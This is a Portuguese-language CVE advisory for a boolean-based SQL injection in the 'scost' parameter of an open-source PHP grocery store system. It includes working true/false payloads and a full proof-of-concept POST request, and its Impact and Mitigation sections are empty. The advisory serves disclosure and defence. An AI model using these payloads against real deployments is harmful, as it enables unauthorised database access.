
CVE-2026-37149 - Vulnerabilidade de injeção de SQL no parâmetro scost de search_products.php no GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.
CVE-2026-37149 Injeção de SQL em GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
Resumo
ID CVE: CVE-2026-37149 Tipo de Vulnerabilidade: Injeção de SQL (CWE-89) Severidade: Alta Descobridor: Dhyey Patel
Descrição
O GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contém uma vulnerabilidade de Injeção de SQL no parâmetro "scost" de "/grocery/search_products.php".
A aplicação não valida adequadamente a entrada fornecida pelo usuário antes de inseri-la em consultas SQL. Um atacante pode injetar expressões SQL maliciosas por meio do parâmetro vulnerável e manipular consultas no banco de dados subjacente.
A exploração bem-sucedida pode permitir acesso não autorizado a informações sensíveis do banco de dados e a execução de instruções SQL arbitrárias.
Produto Afetado
Produto: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
Versão: v1.0
Repositório do Fornecedor:
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
Componente Afetado
Tipo de Ataque Remoto
Informações do Fornecedor Projeto de código aberto mantido pelo proprietário do repositório: https://github.com/anirudhkannanvp
Detalhes Técnicos
A vulnerabilidade foi confirmada usando técnicas de Injeção de SQL baseada em Booleano.
Payload com Condição VERDADEIRA
-1 OR 321=6 AND 000483=000483 --
Payload com Condição FALSA
-1 OR 320=6 AND 000483=000483 --
As respostas da aplicação diferiram com base em a condição injetada ser avaliada como VERDADEIRA ou FALSA, confirmando a Injeção de SQL.
Testes adicionais confirmaram a execução bem-sucedida de funções SQL, incluindo:
SELECT database()
O nome do banco de dados retornado foi:
grocery
Isso demonstra que consultas SQL arbitrárias podem ser executadas por meio do parâmetro vulnerável.
Prova de Conceito
Requisição
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
Resultado
A resposta muda de acordo com a condição Booleana injetada, confirmando a Injeção de SQL no parâmetro "scost".
Impacto
Os impactos potenciais incluem:
Mitigação
Os desenvolvedores devem:
Referências OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection
MITRE CVE Program https://www.cve.org
Créditos Descoberto e reportado por: Dhyey Patel